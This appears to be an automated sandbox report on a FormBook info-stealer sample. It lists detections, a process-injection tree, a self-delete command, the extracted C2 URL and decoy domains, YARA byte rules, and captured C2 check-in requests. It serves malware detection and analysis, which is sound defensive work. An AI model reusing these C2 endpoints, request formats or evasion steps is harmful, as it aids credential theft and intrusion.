Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report DN_467842234567.exe

Overview

General Information

Sample Name:DN_467842234567.exe
Analysis ID:491743
MD5:c16013ea29f9dd1525dcb65c2184784e
SHA1:5afd533f29573050734e428f9f8c9ba08c79546a
SHA256:df05d916a02c09e1dba0df0841f93697e407a334ce8d2371dfe8befd909d8a43
Tags:exeFormbookxloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • DN_467842234567.exe (PID: 1088 cmdline: 'C:\Users\user\Desktop\DN_467842234567.exe' MD5: C16013EA29F9DD1525DCB65C2184784E)
    • DN_467842234567.exe (PID: 6416 cmdline: 'C:\Users\user\Desktop\DN_467842234567.exe' MD5: C16013EA29F9DD1525DCB65C2184784E)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • WWAHost.exe (PID: 4388 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)
          • cmd.exe (PID: 5492 cmdline: /c del 'C:\Users\user\Desktop\DN_467842234567.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.bofight.store/r95e/"], "decoy": ["mindyourbusinesscoin.com", "melandri.club", "13011196.com", "bespinpoker.com", "ohchainpodklo.xyz", "paolacapitanio.com", "hnczppjs.com", "healthygold-carefit.club", "drive16pay.art", "5foldmastermind.com", "especialistasorteios.online", "cjcveterotqze.com", "originaldigitalspaces.com", "21lawsofconfidence.com", "uscryptomininglaws.com", "nilist.xyz", "bergstromgreenholt.icu", "dumbasslures.com", "companieus.com", "2gtfy0.com", "jpbrunos.com", "cdsensor.host", "memorypc.gmbh", "blue-music.com", "lottochain.bet", "exegen.online", "gardenmanager.net", "tyczhhapph5.com", "financecreditpro.com", "you-teikeis.site", "portale-accessi-anomali.com", "performansorganizasyon.xyz", "coinoforum.com", "kagulowa.com", "kxdrstone.com", "projudi-poker.com", "glu-coin.com", "mremvd.icu", "smpldebts.com", "gabgbang.com", "hoochhousebar.com", "zuowxk.icu", "whatipm.com", "healthcaresms.com", "nurhalilah.xyz", "platforma-gaz.space", "railrats.com", "lastmedicalcard.com", "1auwifsr.icu", "ctgybebuy.com", "2377k.com", "mightynz.com", "sbcsdaia.com", "conversionlist.com", "ventas.rest", "scotlaenlinea.site", "byemreperde.com", "getsilverberg.com", "meannamemories.com", "signotimes.com", "jhuipx1cnb.xyz", "5apchk35.xyz", "tspd.site", "aoshihuanyu.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.DN_467842234567.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.DN_467842234567.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.DN_467842234567.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
        • 0x16af8:$sqlite3text: 68 38 2A 90 C5
        • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
        0.2.DN_467842234567.exe.e920000.3.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.DN_467842234567.exe.e920000.3.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.bofight.store/r95e/"], "decoy": ["mindyourbusinesscoin.com", "melandri.club", "13011196.com", "bespinpoker.com", "ohchainpodklo.xyz", "paolacapitanio.com", "hnczppjs.com", "healthygold-carefit.club", "drive16pay.art", "5foldmastermind.com", "especialistasorteios.online", "cjcveterotqze.com", "originaldigitalspaces.com", "21lawsofconfidence.com", "uscryptomininglaws.com", "nilist.xyz", "bergstromgreenholt.icu", "dumbasslures.com", "companieus.com", "2gtfy0.com", "jpbrunos.com", "cdsensor.host", "memorypc.gmbh", "blue-music.com", "lottochain.bet", "exegen.online", "gardenmanager.net", "tyczhhapph5.com", "financecreditpro.com", "you-teikeis.site", "portale-accessi-anomali.com", "performansorganizasyon.xyz", "coinoforum.com", "kagulowa.com", "kxdrstone.com", "projudi-poker.com", "glu-coin.com", "mremvd.icu", "smpldebts.com", "gabgbang.com", "hoochhousebar.com", "zuowxk.icu", "whatipm.com", "healthcaresms.com", "nurhalilah.xyz", "platforma-gaz.space", "railrats.com", "lastmedicalcard.com", "1auwifsr.icu", "ctgybebuy.com", "2377k.com", "mightynz.com", "sbcsdaia.com", "conversionlist.com", "ventas.rest", "scotlaenlinea.site", "byemreperde.com", "getsilverberg.com", "meannamemories.com", "signotimes.com", "jhuipx1cnb.xyz", "5apchk35.xyz", "tspd.site", "aoshihuanyu.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: DN_467842234567.exeReversingLabs: Detection: 64%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORY
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nslF1C.tmp\rcgwzvp.dllReversingLabs: Detection: 11%
          Machine Learning detection for sampleShow sources
          Source: DN_467842234567.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nslF1C.tmp\rcgwzvp.dllJoe Sandbox ML: detected
          Source: 1.1.DN_467842234567.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.DN_467842234567.exe.e920000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.WWAHost.exe.3d57968.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.2.DN_467842234567.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.WWAHost.exe.a398b0.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: DN_467842234567.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: WWAHost.pdb source: DN_467842234567.exe, 00000001.00000002.734645051.0000000000A60000.00000040.00020000.sdmp
          Source: Binary string: WWAHost.pdbUGP source: DN_467842234567.exe, 00000001.00000002.734645051.0000000000A60000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: DN_467842234567.exe, 00000000.00000003.669973012.000000000EAF0000.00000004.00000001.sdmp, DN_467842234567.exe, 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, WWAHost.exe, 00000007.00000002.934191188.0000000003820000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: DN_467842234567.exe, WWAHost.exe
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_00405EC2 FindFirstFileA,FindClose,0_2_00405EC2
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054EC
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_00402671 FindFirstFileA,0_2_00402671
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 4x nop then pop esi1_2_00415815
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 4x nop then pop esi1_2_00415818
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 4x nop then pop esi7_2_00575815
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 4x nop then pop esi7_2_00575818

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49839 -> 5.9.90.226:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49839 -> 5.9.90.226:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49839 -> 5.9.90.226:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49849 -> 35.246.6.109:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49849 -> 35.246.6.109:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49849 -> 35.246.6.109:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.kxdrstone.com
          Source: C:\Windows\explorer.exeDomain query: www.financecreditpro.com
          Source: C:\Windows\explorer.exeDomain query: www.2377k.com
          Source: C:\Windows\explorer.exeDomain query: www.portale-accessi-anomali.com
          Source: C:\Windows\explorer.exeNetwork Connect: 5.9.90.226 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.nurhalilah.xyz
          Source: C:\Windows\explorer.exeDomain query: www.uscryptomininglaws.com
          Source: C:\Windows\explorer.exeDomain query: www.healthcaresms.com
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.11.163 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.drive16pay.art
          Source: C:\Windows\explorer.exeNetwork Connect: 35.246.6.109 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.lottochain.bet
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.148.98 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.smpldebts.com
          Source: C:\Windows\explorer.exeNetwork Connect: 202.165.66.108 80Jump to behavior
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.nurhalilah.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.bofight.store/r95e/
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /r95e/?5jTDyZ=M4286+QNvZx8LKmy/UZnIHKCdMprwtwgM1NJPmpLuQigTfxCAf78NurDWqizjXHDX4ej&l2M=TL00 HTTP/1.1Host: www.nurhalilah.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /r95e/?5jTDyZ=BXQ0bbTmKEXRUVKMKrV3wGde7K0OnYr2R+4D0hwUDGvbHRTPKc91vtcYWtUAnnCzzr+p&l2M=TL00 HTTP/1.1Host: www.uscryptomininglaws.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /r95e/?5jTDyZ=TvKiO4/QDjaQNmJvqYzYpGMovSyo6lhw1ZKWJ3cUrN1tKoZgxWwrK5KCn4028QL8xxrY&l2M=TL00 HTTP/1.1Host: www.financecreditpro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /r95e/?5jTDyZ=TgnCaJJuD0kHzauLDq/dXM7zvJjUq4JZJEpqJXalrHOYrpD3Izw002IN0NuSyeqNHOZT&l2M=TL00 HTTP/1.1Host: www.lottochain.betConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /r95e/?5jTDyZ=Bz2f4T/F+fkIMVoJU/amRd6ca64J0uSW6dugIGIPMe5NoTdXMzMXV3yFXHZPUv8ChFjS&l2M=TL00 HTTP/1.1Host: www.2377k.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /r95e/?5jTDyZ=hlNCb9FJCcnwseEpDycOVhynUMT+mMuln2sCiD+HHAGMht96K5ziw8KZ4U389UfCWXdM&l2M=TL00 HTTP/1.1Host: www.drive16pay.artConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 Sep 2021 19:07:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L1%2Fcb9sF0iYG9tLZL%2BCND7WWwL50k6FpCO6GkNPjTY8HledrDzcbyuzJAJs%2BC3yUD5GaZvDIhbwwTZOsvt8Qf3jJY5JuckW7ioIU2oZopXGVv5Lg9KbGsLMIggxHDd9g"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6957037758895c14-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 31 63 31 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 79 73 74 65 6d 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 34 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 31 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 32 7b 0a 20 Data Ascii: 1c1f<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title>System Error</title> <meta name="robots" content="noindex,nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> <style> /* Base */ body { color:
          Source: DN_467842234567.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: DN_467842234567.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: unknownDNS traffic detected: queries for: www.kxdrstone.com
          Source: global trafficHTTP traffic detected: GET /r95e/?5jTDyZ=M4286+QNvZx8LKmy/UZnIHKCdMprwtwgM1NJPmpLuQigTfxCAf78NurDWqizjXHDX4ej&l2M=TL00 HTTP/1.1Host: www.nurhalilah.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /r95e/?5jTDyZ=BXQ0bbTmKEXRUVKMKrV3wGde7K0OnYr2R+4D0hwUDGvbHRTPKc91vtcYWtUAnnCzzr+p&l2M=TL00 HTTP/1.1Host: www.uscryptomininglaws.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /r95e/?5jTDyZ=TvKiO4/QDjaQNmJvqYzYpGMovSyo6lhw1ZKWJ3cUrN1tKoZgxWwrK5KCn4028QL8xxrY&l2M=TL00 HTTP/1.1Host: www.financecreditpro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /r95e/?5jTDyZ=TgnCaJJuD0kHzauLDq/dXM7zvJjUq4JZJEpqJXalrHOYrpD3Izw002IN0NuSyeqNHOZT&l2M=TL00 HTTP/1.1Host: www.lottochain.betConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /r95e/?5jTDyZ=Bz2f4T/F+fkIMVoJU/amRd6ca64J0uSW6dugIGIPMe5NoTdXMzMXV3yFXHZPUv8ChFjS&l2M=TL00 HTTP/1.1Host: www.2377k.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /r95e/?5jTDyZ=hlNCb9FJCcnwseEpDycOVhynUMT+mMuln2sCiD+HHAGMht96K5ziw8KZ4U389UfCWXdM&l2M=TL00 HTTP/1.1Host: www.drive16pay.artConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_00404FF1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FF1

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
